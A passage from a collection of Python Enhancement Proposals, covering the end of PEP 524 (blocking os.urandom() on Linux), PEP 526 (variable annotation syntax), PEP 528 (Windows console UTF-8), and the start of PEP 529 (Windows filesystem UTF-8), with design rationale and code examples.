code.
The problem with this change is that it expects that users understand
well security and know well each platforms. Python has the tradition of
hiding “implementation details”. For example, os.urandom() is not a
thin wrapper to the /dev/urandom device: it uses
CryptGenRandom() on Windows, it uses getentropy() on OpenBSD, it
tries getrandom() on Linux and Solaris or falls back on reading
/dev/urandom. Python already uses the best available system RNG
depending on the platform.
This PEP does not change the API:
os.urandom(), random.SystemRandom and secrets for security
random module (except random.SystemRandom) for all other usages
Raise BlockingIOError in os.urandom()
Proposition
PEP 522: Allow BlockingIOError in security sensitive APIs on Linux.
Python should not decide for the developer how to handle The bug:
raising immediately a BlockingIOError if os.urandom() is going to
block allows developers to choose how to handle this case:
catch the exception and falls back to a non-secure entropy source:
read /dev/urandom on Linux, use the Python random module
(which is not secure at all), use time, use process identifier, etc.
don’t catch the error, the whole program fails with this fatal
exception
More generally, the exception helps to notify when sometimes goes wrong.
The application can emit a warning when it starts to wait for
os.urandom().
Criticism
For the use case 2 (web server), falling back on non-secure entropy is
not acceptable. The application must handle BlockingIOError: poll
os.urandom() until it completes. Example:
def secret(n=16):
try:
return os.urandom(n)
except BlockingIOError:
pass
print("Wait for system urandom initialization: move your "
"mouse, use your keyboard, use your disk, ...")
while 1:
# Avoid busy-loop: sleep 1 ms
time.sleep(0.001)
try:
return os.urandom(n)
except BlockingIOError:
pass
For correctness, all applications which must generate a secure secret
must be modified to handle BlockingIOError even if The bug is
unlikely.
The case of applications using os.urandom() but don’t really require
security is not well defined. Maybe these applications should not use
os.urandom() at the first place, but always the non-blocking
random module. If os.urandom() is used for security, we are back
to the use case 2 described above: Use Case 2: Web server. If a
developer doesn’t want to drop os.urandom(), the code should be
modified. Example:
def almost_secret(n=16):
try:
return os.urandom(n)
except BlockingIOError:
return bytes(random.randrange(256) for byte in range(n))
The question is if The bug is common enough to require that so many
applications have to be modified.
Another simpler choice is to refuse to start before the system urandom
is initialized:
def secret(n=16):
try:
return os.urandom(n)
except BlockingIOError:
print("Fatal error: the system urandom is not initialized")
print("Wait a bit, and rerun the program later.")
sys.exit(1)
Compared to Python 2.7, Python 3.4 and Python 3.5.2 where os.urandom()
never blocks nor raise an exception on Linux, such behaviour change can
be seen as a major regression.
Add an optional block parameter to os.urandom()
See the issue #27250: Add os.urandom_block().
Add an optional block parameter to os.urandom(). The default value may
be True (block by default) or False (non-blocking).
The first technical issue is to implement os.urandom(block=False) on
all platforms. Only Linux 3.17 (and newer) and Solaris 11.3 (and newer)
have a well defined non-blocking API (getrandom(size,
GRND_NONBLOCK)).
As Raise BlockingIOError in os.urandom(), it doesn’t seem worth it to
make the API more complex for a theoretical (or at least very rare) use
case.
As Leave os.urandom() unchanged, add os.getrandom(), the problem is
that it makes the API more complex and so more error-prone.
Acceptance
The PEP was accepted on 2016-08-08 by Guido van Rossum.
Annexes
Operating system random functions
os.urandom() uses the following functions:
OpenBSD: getentropy()
(OpenBSD 5.6)
Linux: getrandom() (Linux 3.17)
– see also A system call for random numbers: getrandom()
Solaris: getentropy(),
getrandom()
(both need Solaris 11.3)
UNIX, BSD: /dev/urandom, /dev/random
Windows: CryptGenRandom()
(Windows XP)
On Linux, commands to get the status of /dev/random (results are
number of bytes):
$ cat /proc/sys/kernel/random/entropy_avail
2850
$ cat /proc/sys/kernel/random/poolsize
4096
Why using os.urandom()?
Since os.urandom() is implemented in the kernel, it doesn’t have
issues of user-space RNG. For example, it is much harder to get its
state. It is usually built on a CSPRNG, so even if its state is
“stolen”, it is hard to compute previously generated numbers. The kernel
has a good knowledge of entropy sources and feed regularly the entropy
pool.
That’s also why os.urandom() is preferred over ssl.RAND_bytes().
Copyright
This document has been placed in the public domain.
| Final | PEP 524 – Make os.urandom() blocking on Linux | Standards Track | Modify os.urandom() to block on Linux 3.17 and newer until the OS
urandom is initialized to increase the security. |
PEP 526 – Syntax for Variable Annotations
Author:
Ryan Gonzalez <rymg19 at gmail.com>, Philip House <phouse512 at gmail.com>, Ivan Levkivskyi <levkivskyi at gmail.com>, Lisa Roach <lisaroach14 at gmail.com>, Guido van Rossum <guido at python.org>
Status:
Final
Type:
Standards Track
Topic:
Typing
Created:
09-Aug-2016
Python-Version:
3.6
Post-History:
30-Aug-2016, 02-Sep-2016
Resolution:
Python-Dev message
Table of Contents
Status
Notice for Reviewers
Abstract
Rationale
Non-goals
Specification
Global and local variable annotations
Class and instance variable annotations
Annotating expressions
Where annotations aren’t allowed
Variable annotations in stub files
Preferred coding style for variable annotations
Changes to Standard Library and Documentation
Runtime Effects of Type Annotations
Other uses of annotations
Rejected/Postponed Proposals
Backwards Compatibility
Implementation
Copyright
Status
This PEP has been provisionally accepted by the BDFL.
See the acceptance message for more color:
https://mail.python.org/pipermail/python-dev/2016-September/146282.html
Notice for Reviewers
This PEP was drafted in a separate repo:
https://github.com/phouse512/peps/tree/pep-0526.
There was preliminary discussion on python-ideas and at
https://github.com/python/typing/issues/258.
Before you bring up an objection in a public forum please at least
read the summary of rejected ideas listed at the end of this PEP.
Abstract
PEP 484 introduced type hints, a.k.a. type annotations. While its
main focus was function annotations, it also introduced the notion of
type comments to annotate variables:
# 'primes' is a list of integers
primes = [] # type: List[int]
# 'captain' is a string (Note: initial value is a problem)
captain = ... # type: str
class Starship:
# 'stats' is a class variable
stats = {} # type: Dict[str, int]
This PEP aims at adding syntax to Python for annotating the types of variables
(including class variables and instance variables),
instead of expressing them through comments:
primes: List[int] = []
captain: str # Note: no initial value!
class Starship:
stats: ClassVar[Dict[str, int]] = {}
PEP 484 explicitly states that type comments are intended to help with
type inference in complex cases, and this PEP does not change this
intention. However, since in practice type comments have also been
adopted for class variables and instance variables, this PEP also
discusses the use of type annotations for those variables.
Rationale
Although type comments work well enough, the fact that they’re
expressed through comments has some downsides:
Text editors often highlight comments differently from type annotations.
There’s no way to annotate the type of an undefined variable; one needs to
initialize it to None (e.g. a = None # type: int).
Variables annotated in a conditional branch are difficult to read:if some_value:
my_var = function() # type: Logger
else:
my_var = another_function() # Why isn't there a type here?
Since type comments aren’t actually part of the language, if a Python script
wants to parse them, it requires a custom parser instead of just using
ast.
Type comments are used a lot in typeshed. Migrating typeshed to use
the variable annotation syntax instead of type comments would improve
readability of stubs.
In situations where normal comments and type comments are used together, it is
difficult to distinguish them:path = None # type: Optional[str] # Path to module source
It’s impossible to retrieve the annotations at runtime outside of
attempting to find the module’s source code and parse it at runtime,
which is inelegant, to say the least.
The majority of these issues can be alleviated by making the syntax
a core part of the language. Moreover, having a dedicated annotation syntax
for class and instance variables (in addition to method annotations) will
pave the way to static duck-typing as a complement to nominal typing defined
by PEP 484.
Non-goals
While the proposal is accompanied by an extension of the typing.get_type_hints
standard library function for runtime retrieval of annotations, variable
annotations are not designed for runtime type checking. Third party packages
will have to be developed to implement such functionality.
It should also be emphasized that Python will remain a dynamically typed
language, and the authors have no desire to ever make type hints mandatory,
even by convention. Type annotations should not be confused with variable
declarations in statically typed languages. The goal of annotation syntax is
to provide an easy way to specify structured type metadata
for third party tools.
This PEP does not require type checkers to change their type checking
rules. It merely provides a more readable syntax to replace type
comments.
Specification
Type annotation can be added to an assignment statement or to a single
expression indicating the desired type of the annotation target to a third
party type checker:
my_var: int
my_var = 5 # Passes type check.
other_var: int = 'a' # Flagged as error by type checker,
# but OK at runtime.
This syntax does not introduce any new semantics beyond PEP 484, so that
the following three statements are equivalent:
var = value # type: annotation
var: annotation; var = value
var: annotation = value
Below we specify the syntax of type annotations
in different contexts and their runtime effects.
We also suggest how type checkers might interpret annotations, but
compliance to these suggestions is not mandatory. (This is in line
with the attitude towards compliance in PEP 484.)
Global and local variable annotations
The types of locals and globals can be annotated as follows:
some_number: int # variable without initial value
some_list: List[int] = [] # variable with initial value
Being able to omit the initial value allows for easier typing of variables
assigned in conditional branches:
sane_world: bool
if 2+2 == 4:
sane_world = True
else:
sane_world = False
Note that, although the syntax does allow tuple packing, it does not allow
one to annotate the types of variables when tuple unpacking is used:
# Tuple packing with variable annotation syntax
t: Tuple[int, ...] = (1, 2, 3)
# or
t: Tuple[int, ...] = 1, 2, 3 # This only works in Python 3.8+
# Tuple unpacking with variable annotation syntax
header: str
kind: int
body: Optional[List[str]]
header, kind, body = message
Omitting the initial value leaves the variable uninitialized:
a: int
print(a) # raises NameError
However, annotating a local variable will cause the interpreter to always make
it a local:
def f():
a: int
print(a) # raises UnboundLocalError
# Commenting out the a: int makes it a NameError.
as if the code were:
def f():
if False: a = 0
print(a) # raises UnboundLocalError
Duplicate type annotations will be ignored. However, static type
checkers may issue a warning for annotations of the same variable
by a different type:
a: int
a: str # Static type checker may or may not warn about this.
Class and instance variable annotations
Type annotations can also be used to annotate class and instance variables
in class bodies and methods. In particular, the value-less notation a: int
allows one to annotate instance variables that should be initialized
in __init__ or __new__. The proposed syntax is as follows:
class BasicStarship:
captain: str = 'Picard' # instance variable with default
damage: int # instance variable without default
stats: ClassVar[Dict[str, int]] = {} # class variable
Here ClassVar is a special class defined by the typing module that
indicates to the static type checker that this variable should not be
set on instances.
Note that a ClassVar parameter cannot include any type variables, regardless
of the level of nesting: ClassVar[T] and ClassVar[List[Set[T]]] are
both invalid if T is a type variable.
This could be illustrated with a more detailed example. In this class:
class Starship:
captain = 'Picard'
stats = {}
def __init__(self, damage, captain=None):
self.damage = damage
if captain:
self.captain = captain # Else keep the default
def hit(self):
Starship.stats['hits'] = Starship.stats.get('hits', 0) + 1
stats is intended to be a class variable (keeping track of many different
per-game statistics), while captain is an instance variable with a default
value set in the class. This difference might not be seen by a type
checker: both get initialized in the class, but captain serves only
as a convenient default value for the instance variable, while stats
is truly a class variable – it is intended to be shared by all instances.
Since both variables happen to be initialized at the class level, it is
useful to distinguish them by marking class variables as annotated with
types wrapped in ClassVar[...]. In this way a type checker may flag
accidental assignments to attributes with the same name on instances.
For example, annotating the discussed class:
class Starship:
captain: str = 'Picard'
damage: int
stats: ClassVar[Dict[str, int]] = {}
def __init__(self, damage: int, captain: str = None):
self.damage = damage
if captain:
self.captain = captain # Else keep the default
def hit(self):
Starship.stats['hits'] = Starship.stats.get('hits', 0) + 1
enterprise_d = Starship(3000)
enterprise_d.stats = {} # Flagged as error by a type checker
Starship.stats = {} # This is OK
As a matter of convenience (and convention), instance variables can be
annotated in __init__ or other methods, rather than in the class:
from typing import Generic, TypeVar
T = TypeVar('T')
class Box(Generic[T]):
def __init__(self, content):
self.content: T = content
Annotating expressions
The target of the annotation can be any valid single assignment
target, at least syntactically (it is up to the type checker what to
do with this):
class Cls:
pass
c = Cls()
c.x: int = 0 # Annotates c.x with int.
c.y: int # Annotates c.y with int.
d = {}
d['a']: int = 0 # Annotates d['a'] with int.
d['b']: int # Annotates d['b'] with int.
Note that even a parenthesized name is considered an expression,
not a simple name:
(x): int # Annotates x with int, (x) treated as expression by compiler.
(y): int = 0 # Same situation here.
Where annotations aren’t allowed
It is illegal to attempt to annotate variables subject to global
or nonlocal in the same function scope:
def f():
global x: int # SyntaxError
def g():
x: int # Also a SyntaxError
global x
The reason is that global and nonlocal don’t own variables;
therefore, the type annotations belong in the scope owning the variable.
Only single assignment targets and single right hand side values are allowed.
In addition, one cannot annotate variables used in a for or with
statement; they can be annotated ahead of time, in a similar manner to tuple
unpacking:
a: int
for a in my_iter:
...
f: MyFile
with myfunc() as f:
...
Variable annotations in stub files
As variable annotations are more readable than type comments, they are
preferred in stub files for all versions of Python, including Python 2.7.
Note that stub files are not executed by Python interpreters, and therefore
using variable annotations will not lead to errors. Type checkers should
support variable annotations in stubs for all versions of Python. For example:
# file lib.pyi
ADDRESS: unicode = ...
class Error:
cause: Union[str, unicode]
Preferred coding style for variable annotations
Annotations for module level variables, class and instance variables,
and local variables should have a single space after corresponding colon.
There should be no space before the colon. If an assignment has right hand
side, then the equality sign should have exactly one space on both sides.
Examples:
Yes:code: int
class Point:
coords: Tuple[int, int]
label: str = '<unknown>'
No:code:int # No space after colon
code : int # Space before colon
class Test:
result: int=0 # No spaces around equality sign
Changes to Standard Library and Documentation
A new covariant type ClassVar[T_co] is added to the typing
module. It accepts only a single argument that should be a valid type,
and is used to annotate class variables that should not be set on class
instances. This restriction is ensured by static checkers,
but not at runtime. See the
classvar section for examples and explanations for the usage of
ClassVar, and see the rejected section
for more information on the reasoning behind ClassVar.
Function get_type_hints in the typing module will be extended,
so that one can retrieve type annotations at runtime from modules
and classes as well as functions.
Annotations are returned as a dictionary mapping from variable or arguments
to their type hints with forward references evaluated.
For classes it returns a mapping (perhaps collections.ChainMap)
constructed from annotations in method resolution order.
Recommended guidelines for using annotations will be added to the
documentation, containing a pedagogical recapitulation of specifications
described in this PEP and in PEP 484. In addition, a helper script for
translating type comments into type annotations will be published
separately from the standard library.
Runtime Effects of Type Annotations
Annotating a local variable will cause
the interpreter to treat it as a local, even if it was never assigned to.
Annotations for local variables will not be evaluated:
def f():
x: NonexistentName # No error.
However, if it is at a module or class level, then the type will be
evaluated:
x: NonexistentName # Error!
class X:
var: NonexistentName # Error!
In addition, at the module or class level, if the item being annotated is a
simple name, then it and the annotation will be stored in the
__annotations__ attribute of that module or class (mangled if private)
as an ordered mapping from names to evaluated annotations.
Here is an example:
from typing import Dict
class Player:
...
players: Dict[str, Player]
__points: int
print(__annotations__)
# prints: {'players': typing.Dict[str, __main__.Player],
# '_Player__points': <class 'int'>}
__annotations__ is writable, so this is permitted:
__annotations__['s'] = str
But attempting to update __annotations__ to something other than an
ordered mapping may result in a TypeError:
class C:
__annotations__ = 42
x: int = 5 # raises TypeError
(Note that the assignment to __annotations__, which is the
culprit, is accepted by the Python interpreter without questioning it
– but the subsequent type annotation expects it to be a
MutableMapping and will fail.)
The recommended way of getting annotations at runtime is by using
typing.get_type_hints function; as with all dunder attributes,
any undocumented use of __annotations__ is subject to breakage
without warning:
from typing import Dict, ClassVar, get_type_hints
class Starship:
hitpoints: int = 50
stats: ClassVar[Dict[str, int]] = {}
shield: int = 100
captain: str
def __init__(self, captain: str) -> None:
...
assert get_type_hints(Starship) == {'hitpoints': int,
'stats': ClassVar[Dict[str, int]],
'shield': int,
'captain': str}
assert get_type_hints(Starship.__init__) == {'captain': str,
'return': None}
Note that if annotations are not found statically, then the
__annotations__ dictionary is not created at all. Also the
value of having annotations available locally does not offset
the cost of having to create and populate the annotations dictionary
on every function call. Therefore, annotations at function level are
not evaluated and not stored.
Other uses of annotations
While Python with this PEP will not object to:
alice: 'well done' = 'A+'
bob: 'what a shame' = 'F-'
since it will not care about the type annotation beyond “it evaluates
without raising”, a type checker that encounters it will flag it,
unless disabled with # type: ignore or @no_type_check.
However, since Python won’t care what the “type” is,
if the above snippet is at the global level or in a class, __annotations__
will include {'alice': 'well done', 'bob': 'what a shame'}.
These stored annotations might be used for other purposes,
but with this PEP we explicitly recommend type hinting as the
preferred use of annotations.
Rejected/Postponed Proposals
Should we introduce variable annotations at all?
Variable annotations have already been around for almost two years
in the form of type comments, sanctioned by PEP 484. They are
extensively used by third party type checkers (mypy, pytype,
PyCharm, etc.) and by projects using the type checkers. However, the
comment syntax has many downsides listed in Rationale. This PEP is
not about the need for type annotations, it is about what should be
the syntax for such annotations.
Introduce a new keyword:
The choice of a good keyword is hard,
e.g. it can’t be var because that is way too common a variable name,
and it can’t be local if we want to use it for class variables or
globals. Second, no matter what we choose, we’d still need
a __future__ import.
Use def as a keyword:
The proposal would be:def primes: List[int] = []
def captain: str
The problem with this is that def means “define a function” to
generations of Python programmers (and tools!), and using it also to
define variables does not increase clarity. (Though this is of
course subjective.)
Use function based syntax:
It was proposed to annotate types of variables using
var = cast(annotation[, value]). Although this syntax
alleviates some problems with type comments like absence of the annotation
in AST, it does not solve other problems such as readability
and it introduces possible runtime overhead.
Allow type annotations for tuple unpacking:
This causes ambiguity: it’s not clear what this statement means:x, y: T
Are x and y both of type T, or do we expect T to be
a tuple type of two items that are distributed over x and y,
or perhaps x has type Any and y has type T? (The
latter is what this would mean if this occurred in a function
signature.) Rather than leave the (human) reader guessing, we
forbid this, at least for now.
Parenthesized form (var: type) for annotations:
It was brought up on python-ideas as a remedy for the above-mentioned
ambiguity, but it was rejected since such syntax would be hairy,
the benefits are slight, and the readability would be poor.
Allow annotations in chained assignments:
This has problems of ambiguity and readability similar to tuple
unpacking, for example in:x: int = y = 1
z = w: int = 1
it is ambiguous, what should the types of y and z be?
Also the second line is difficult to parse.
Allow annotations in with and for statement:
This was rejected because in for it would make it hard to spot the actual
iterable, and in with it would confuse the CPython’s LL(1) parser.
Evaluate local annotations at function definition time:
This has been rejected by Guido because the placement of the annotation
strongly suggests that it’s in the same scope as the surrounding code.
Store variable annotations also in function scope:
The value of having the annotations available locally is just not enough
to significantly offset the cost of creating and populating the dictionary
on each function call.
Initialize variables annotated without assignment:
It was proposed on python-ideas to initialize x in x: int to
None or to an additional special constant like Javascript’s
undefined. However, adding yet another singleton value to the language
would needed to be checked for everywhere in the code. Therefore,
Guido just said plain “No” to this.
Add also InstanceVar to the typing module:
This is redundant because instance variables are way more common than
class variables. The more common usage deserves to be the default.
Allow instance variable annotations only in methods:
The problem is that many __init__ methods do a lot of things besides
initializing instance variables, and it would be harder (for a human)
to find all the instance variable annotations.
And sometimes __init__ is factored into more helper methods
so it’s even harder to chase them down. Putting the instance variable
annotations together in the class makes it easier to find them,
and helps a first-time reader of the code.
Use syntax x: class t = v for class variables:
This would require a more complicated parser and the class
keyword would confuse simple-minded syntax highlighters. Anyway we
need to have ClassVar store class variables to
__annotations__, so a simpler syntax was chosen.
Forget about ClassVar altogether:
This was proposed since mypy seems to be getting along fine without a way
to distinguish between class and instance variables. But a type checker
can do useful things with the extra information, for example flag
accidental assignments to a class variable via the instance
(which would create an instance variable shadowing the class variable).
It could also flag instance variables with mutable defaults,
a well-known hazard.
Use ClassAttr instead of ClassVar:
The main reason why ClassVar is better is following: many things are
class attributes, e.g. methods, descriptors, etc. But only specific
attributes are conceptually class variables (or maybe constants).
Do not evaluate annotations, treat them as strings:
This would be inconsistent with the behavior of function annotations that
are always evaluated. Although this might be reconsidered in future,
it was decided in PEP 484 that this would have to be a separate PEP.
Annotate variable types in class docstring:
Many projects already use various docstring conventions, often without
much consistency and generally without conforming to the PEP 484 annotation
syntax yet. Also this would require a special sophisticated parser.
This, in turn, would defeat the purpose of the PEP –
collaborating with the third party type checking tools.
Implement __annotations__ as a descriptor:
This was proposed to prohibit setting __annotations__ to something
non-dictionary or non-None. Guido has rejected this idea as unnecessary;
instead a TypeError will be raised if an attempt is made to update
__annotations__ when it is anything other than a mapping.
Treating bare annotations the same as global or nonlocal:
The rejected proposal would prefer that the presence of an
annotation without assignment in a function body should not involve
any evaluation. In contrast, the PEP implies that if the target
is more complex than a single name, its “left-hand part” should be
evaluated at the point where it occurs in the function body, just to
enforce that it is defined. For example, in this example:def foo(self):
slef.name: str
the name slef should be evaluated, just so that if it is not
defined (as is likely in this example :-), the error will be caught
at runtime. This is more in line with what happens when there is
an initial value, and thus is expected to lead to fewer surprises.
(Also note that if the target was self.name (this time correctly
spelled :-), an optimizing compiler has no obligation to evaluate
self as long as it can prove that it will definitely be
defined.)
Backwards Compatibility
This PEP is fully backwards compatible.
Implementation
An implementation for Python 3.6 is found on GitHub repo at
https://github.com/ilevkivskyi/cpython/tree/pep-526
Copyright
This document has been placed in the public domain.
| Final | PEP 526 – Syntax for Variable Annotations | Standards Track | PEP 484 introduced type hints, a.k.a. type annotations. While its
main focus was function annotations, it also introduced the notion of
type comments to annotate variables: |
PEP 528 – Change Windows console encoding to UTF-8
Author:
Steve Dower <steve.dower at python.org>
Status:
Final
Type:
Standards Track
Created:
27-Aug-2016
Python-Version:
3.6
Post-History:
01-Sep-2016, 04-Sep-2016
Resolution:
Python-Dev message
Table of Contents
Abstract
Specific Changes
Add _io.WindowsConsoleIO
Add _PyOS_WindowsConsoleReadline
Add legacy mode
Alternative Approaches
Code that may break
Assuming stdin/stdout encoding
Incorrectly using the raw object
Using the raw object with small buffers
Copyright
Abstract
Historically, Python uses the ANSI APIs for interacting with the Windows
operating system, often via C Runtime functions. However, these have been long
discouraged in favor of the UTF-16 APIs. Within the operating system, all text
is represented as UTF-16, and the ANSI APIs perform encoding and decoding using
the active code page.
This PEP proposes changing the default standard stream implementation on Windows
to use the Unicode APIs. This will allow users to print and input the full range
of Unicode characters at the default Windows console. This also requires a
subtle change to how the tokenizer parses text from readline hooks.
Specific Changes
Add _io.WindowsConsoleIO
Currently an instance of _io.FileIO is used to wrap the file descriptors
representing standard input, output and error. We add a new class (implemented
in C) _io.WindowsConsoleIO that acts as a raw IO object using the Windows
console functions, specifically, ReadConsoleW and WriteConsoleW.
This class will be used when the legacy-mode flag is not in effect, when opening
a standard stream by file descriptor and the stream is a console buffer rather
than a redirected file. Otherwise, _io.FileIO will be used as it is today.
This is a raw (bytes) IO class that requires text to be passed encoded with
utf-8, which will be decoded to utf-16-le and passed to the Windows APIs.
Similarly, bytes read from the class will be provided by the operating system as
utf-16-le and converted into utf-8 when returned to Python.
The use of an ASCII compatible encoding is required to maintain compatibility
with code that bypasses the TextIOWrapper and directly writes ASCII bytes to
the standard streams (for example, Twisted’s process_stdinreader.py). Code that assumes
a particular encoding for the standard streams other than ASCII will likely
break.
Add _PyOS_WindowsConsoleReadline
To allow Unicode entry at the interactive prompt, a new readline hook is
required. The existing PyOS_StdioReadline function will delegate to the new
_PyOS_WindowsConsoleReadline function when reading from a file descriptor
that is a console buffer and the legacy-mode flag is not in effect (the logic
should be identical to above).
Since the readline interface is required to return an 8-bit encoded string with
no embedded nulls, the _PyOS_WindowsConsoleReadline function transcodes from
utf-16-le as read from the operating system into utf-8.
The function PyRun_InteractiveOneObject which currently obtains the encoding
from sys.stdin will select utf-8 unless the legacy-mode flag is in effect.
This may require readline hooks to change their encodings to utf-8, or to
require legacy-mode for correct behaviour.
Add legacy mode
Launching Python with the environment variable PYTHONLEGACYWINDOWSSTDIO set
will enable the legacy-mode flag, which completely restores the previous
behaviour.
Alternative Approaches
The win_unicode_console package is a pure-Python alternative to changing the
default behaviour of the console. It implements essentially the same
modifications as described here using pure Python code.
Code that may break
The following code patterns may break or see different behaviour as a result of
this change. All of these code samples require explicitly choosing to use a raw
file object in place of a more convenient wrapper that would prevent any visible
change.
Assuming stdin/stdout encoding
Code that assumes that the encoding required by sys.stdin.buffer or
sys.stdout.buffer is 'mbcs' or a more specific encoding may currently be
working by chance, but could encounter issues under this change. For example:
>>> sys.stdout.buffer.write(text.encode('mbcs'))
>>> r = sys.stdin.buffer.read(16).decode('cp437')
To correct this code, the encoding specified on the TextIOWrapper should be
used, either implicitly or explicitly:
>>> # Fix 1: Use wrapper correctly
>>> sys.stdout.write(text)
>>> r = sys.stdin.read(16)
>>> # Fix 2: Use encoding explicitly
>>> sys.stdout.buffer.write(text.encode(sys.stdout.encoding))
>>> r = sys.stdin.buffer.read(16).decode(sys.stdin.encoding)
Incorrectly using the raw object
Code that uses the raw IO object and does not correctly handle partial reads and
writes may be affected. This is particularly important for reads, where the
number of characters read will never exceed one-fourth of the number of bytes
allowed, as there is no feasible way to prevent input from encoding as much
longer utf-8 strings:
>>> raw_stdin = sys.stdin.buffer.raw
>>> data = raw_stdin.read(15)
abcdefghijklm
b'abc'
# data contains at most 3 characters, and never more than 12 bytes
# error, as "defghijklm\r\n" is passed to the interactive prompt
To correct this code, the buffered reader/writer should be used, or the caller
should continue reading until its buffer is full:
>>> # Fix 1: Use the buffered reader/writer
>>> stdin = sys.stdin.buffer
>>> data = stdin.read(15)
abcedfghijklm
b'abcdefghijklm\r\n'
>>> # Fix 2: Loop until enough bytes have been read
>>> raw_stdin = sys.stdin.buffer.raw
>>> b = b''
>>> while len(b) < 15:
... b += raw_stdin.read(15)
abcedfghijklm
b'abcdefghijklm\r\n'
Using the raw object with small buffers
Code that uses the raw IO object and attempts to read less than four characters
will now receive an error. Because it’s possible that any single character may
require up to four bytes when represented in utf-8, requests must fail:
>>> raw_stdin = sys.stdin.buffer.raw
>>> data = raw_stdin.read(3)
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
ValueError: must read at least 4 bytes
The only workaround is to pass a larger buffer:
>>> # Fix: Request at least four bytes
>>> raw_stdin = sys.stdin.buffer.raw
>>> data = raw_stdin.read(4)
a
b'a'
>>> >>>
(The extra >>> is due to the newline remaining in the input buffer and is
expected in this situation.)
Copyright
This document has been placed in the public domain.
| Final | PEP 528 – Change Windows console encoding to UTF-8 | Standards Track | Historically, Python uses the ANSI APIs for interacting with the Windows
operating system, often via C Runtime functions. However, these have been long
discouraged in favor of the UTF-16 APIs. Within the operating system, all text
is represented as UTF-16, and the ANSI APIs perform encoding and decoding using
the active code page. |
PEP 529 – Change Windows filesystem encoding to UTF-8
Author:
Steve Dower <steve.dower at python.org>
Status:
Final
Type:
Standards Track
Created:
27-Aug-2016
Python-Version:
3.6
Post-History:
01-Sep-2016, 04-Sep-2016
Resolution:
Python-Dev message
Table of Contents
Abstract
Background
Proposal
Specific Changes
Update sys.getfilesystemencoding
Add sys.getfilesystemencodeerrors
Update path_converter
Remove unused ANSI code
Add legacy mode
Undeprecate bytes paths on Windows
Beta experiment
Affected Modules
Rejected Alternatives
Use strict mbcs decoding
Make bytes paths an error on Windows
Make bytes paths an error on all platforms
Code that may break
Not managing encodings across boundaries
Explicitly using ‘mbcs’
Copyright
Abstract
Historically, Python uses the ANSI APIs for interacting with the Windows
operating system, often via C Runtime functions. However, these have been long
discouraged in favor of the UTF-16 APIs. Within the operating system, all text
is represented as UTF-16, and the ANSI APIs perform encoding and decoding using
the active code page. See Naming Files, Paths, and Namespaces for
more details.
This PEP proposes changing the default filesystem encoding on Windows to utf-8,
and changing all filesystem functions to use the Unicode APIs for filesystem
paths. This will not affect code that uses strings to represent paths, however
those that use bytes for paths will now be able to correctly round-trip all
valid paths in Windows filesystems. Currently, the conversions between Unicode
(in the OS) and bytes (in Python) were lossy and would fail to round-trip
characters outside of the user’s active code page.
Notably, this does not impact the encoding of the contents of files. These will
continue to default to locale.getpreferredencoding() (for text files) or
plain bytes (for binary files). This only affects the encoding used when users
pass a bytes object to Python where it is then passed to the operating system as
a path name.
Background
File system paths are almost universally represented as text with an encoding
determined by the file system. In Python, we expose these paths via a number of
interfaces, such as the os and io modules. Paths may be passed either
direction across these interfaces, that is, from the filesystem to the
application (for example, os.listdir()), or from the application to the
filesystem (for example, os.unlink()).
When paths are passed between the filesystem and the application, they are
either passed through as a bytes blob or converted to/from str using
os.fsencode() and os.fsdecode() or explicit encoding using
sys.getfilesystemencoding(). The result of encoding a string with
sys.getfilesystemencoding() is a blob of bytes in the native format for the
default file system.
On Windows, the native format for the filesystem is utf-16-le. The recommended
platform APIs for accessing the filesystem all accept and return text encoded in
this format. However, prior to Windows NT (and possibly further back), the
native format was a configurable machine option and a separate set of APIs
existed to accept this format. The option (the “active code page”) and these
APIs (the “*A functions”) still exist in recent versions of Windows for
backwards compatibility, though new functionality often only has a utf-16-le API
(the “*W functions”).
In Python, str is recommended because it can correctly round-trip all characters
used in paths (on POSIX with surrogateescape handling; on Windows because str
maps to the native representation). On Windows bytes cannot round-trip all
characters used in paths, as Python internally uses the *A functions and hence
the encoding is “whatever the active code page is”. Since the active code page
cannot represent all Unicode characters, the conversion of a path into bytes can
lose information without warning or any available indication.
As a demonstration of this:
>>> open('test\uAB00.txt', 'wb').close()
>>> import glob
>>> glob.glob('test*')
['test\uab00.txt']
>>> glob.glob(b'test*')
[b'test?.txt']
The Unicode character in the second call to glob has been replaced by a ‘?’,
which means passing the path back into the filesystem will result in a
FileNotFoundError. The same results may be observed with os.listdir() or
any function that matches the return type to the parameter type.
While one user-accessible fix is to use str everywhere, POSIX systems generally
do not suffer from data loss when using bytes exclusively as the bytes are the
canonical representation. Even if the encoding is “incorrect” by some standard,
the file system will still map the bytes back to the file. Making use of this
avoids the cost of decoding and reencoding, such that (theoretically, and only
on POSIX), code such as this may be faster because of the use of b'.'
compared to using '.':
>>> for f in os.listdir(b'.'):
... os.stat(f)
...
As a result, POSIX-focused library authors prefer to use bytes to represent
paths. For some authors it is also a convenience, as their code may receive
bytes already known to be encoded correctly, while others are attempting to
simplify porting their code from Python 2. However, the correctness assumptions
do not carry over to Windows where Unicode is the canonical representation, and
errors may result. This potential data loss is why the use of bytes paths on
Windows was deprecated in Python 3.3 - all of the above code snippets produce
deprecation warnings on Windows.
Proposal
Currently the default filesystem encoding is ‘mbcs’, which is a meta-encoder
that uses the active code page. However, when bytes are passed to the filesystem
they go through the *A APIs and the operating system handles encoding. In this
case, paths are always encoded using the equivalent of ‘mbcs:replace’ with no
opportunity for Python to override or change this.
This proposal would remove all use of the *A APIs and only ever call the *W
APIs. When Windows returns paths to Python as str, they will be decoded from
utf-16-le and returned as text (in whatever the minimal representation is). When
Python code requests paths as bytes, the paths will be transcoded from
utf-16-le into utf-8 using surrogatepass (Windows does not validate surrogate
pairs, so it is possible to have invalid surrogates in filenames). Equally, when
paths are provided as bytes, they are transcoded from utf-8 into utf-16-le
and passed to the *W APIs.
The use of utf-8 will not be configurable, except for the provision of a
“legacy mode” flag to revert to the previous behaviour.
The surrogateescape error mode does not apply here, as the concern is not
about retaining nonsensical bytes. Any path returned from the operating system
will be valid Unicode, while invalid paths created by the user should raise a
decoding error (currently these would raise OSError or a subclass).
The choice of utf-8 bytes (as opposed to utf-16-le bytes) is to ensure the
ability to round-trip path names and allow basic manipulation (for example,
using the os.path module) when assuming an ASCII-compatible encoding. Using
utf-16-le as the encoding is more pure, but will cause more issues than are
resolved.
This change would also undeprecate the use of bytes paths on Windows. No change
to the semantics of using bytes as a path is required - as before, they must be
encoded with the encoding specified by sys.getfilesystemencoding().
Specific Changes
Update sys.getfilesystemencoding
Remove the default value for Py_FileSystemDefaultEncoding and set it in
